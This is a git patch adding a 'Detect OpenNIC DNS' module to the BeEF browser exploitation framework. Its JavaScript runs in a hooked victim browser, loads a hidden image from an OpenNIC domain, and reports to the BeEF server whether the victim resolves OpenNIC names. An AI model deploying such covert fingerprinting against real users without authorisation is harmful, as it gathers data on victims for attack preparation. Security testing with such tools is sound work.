From 57ab7fda8476e696c2cc596c6d77f51dcdfeeaa0 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 13 Mar 2022 02:11:17 +1100 Subject: [PATCH] Detect OpenNIC DNS (#2341) --- modules/network/detect_opennic/command.js | 43 ++++++++++++++++++++++ modules/network/detect_opennic/config.yaml | 15 ++++++++ modules/network/detect_opennic/module.rb | 19 ++++++++++ 3 files changed, 77 insertions(+) create mode 100644 modules/network/detect_opennic/command.js create mode 100644 modules/network/detect_opennic/config.yaml create mode 100644 modules/network/detect_opennic/module.rb diff --git a/modules/network/detect_opennic/command.js b/modules/network/detect_opennic/command.js new file mode 100644 index 000000000..d1bb77207 --- /dev/null +++ b/modules/network/detect_opennic/command.js @@ -0,0 +1,43 @@ +// +// Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + if (document.getElementById('opennic_img_<%= @command_id %>')) { + return "Img already created"; + } + + var img = new Image(); + img.setAttribute("style", "visibility:hidden"); + img.setAttribute("width", "0"); + img.setAttribute("height", "0"); + img.src = '<%= @opennic_resource %>'; + img.id = 'opennic_img_<%= @command_id %>'; + img.setAttribute("attr", "start"); + img.onerror = function() { + this.setAttribute("attr", "error"); + }; + img.onload = function() { + this.setAttribute("attr", "load"); + }; + + document.body.appendChild(img); + + setTimeout(function() { + var img = document.getElementById('opennic_img_<%= @command_id %>'); + if (img.getAttribute("attr") == "error") { + beef.debug('[Detect OpenNIC] Browser is not resolving OpenNIC domains.'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not resolving OpenNIC domains.'); + } else if (img.getAttribute("attr") == "load") { + beef.debug('[Detect OpenNIC] Browser is resolving OpenNIC domains.'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is resolving OpenNIC domains.'); + } else if (img.getAttribute("attr") == "start") { + beef.debug('[Detect OpenNIC] Timed out. Cannot determine if browser is resolving OpenNIC domains.'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timed out. Cannot determine if browser is resolving OpenNIC domains.'); + }; + document.body.removeChild(img); + }, <%= @timeout %>); + +}); diff --git a/modules/network/detect_opennic/config.yaml b/modules/network/detect_opennic/config.yaml new file mode 100644 index 000000000..45a39a36d --- /dev/null +++ b/modules/network/detect_opennic/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_opennic: + enable: true + category: "Network" + name: "Detect OpenNIC DNS" + description: "This module will detect if the zombie is currently using OpenNIC DNS resolvers.

Note that the detection may fail when attempting to load a HTTP resource from a hooked HTTPS page." + authors: ["wade", "pdp", "bm", "xntrik", "bcoles"] + target: + working: ["ALL"] diff --git a/modules/network/detect_opennic/module.rb b/modules/network/detect_opennic/module.rb new file mode 100644 index 000000000..09827bbde --- /dev/null +++ b/modules/network/detect_opennic/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_opennic < BeEF::Core::Command + def self.options + [ + { 'name' => 'opennic_resource', 'ui_label' => 'What OpenNIC image resource to request', 'value' => 'http://be.libre/lang/flag/us.png' }, + { 'name' => 'timeout', 'ui_label' => 'Detection timeout', 'value' => '10000' } + ] + end + + def post_execute + return if @datastore['result'].nil? + + save({ 'result' => @datastore['result'] }) + end +end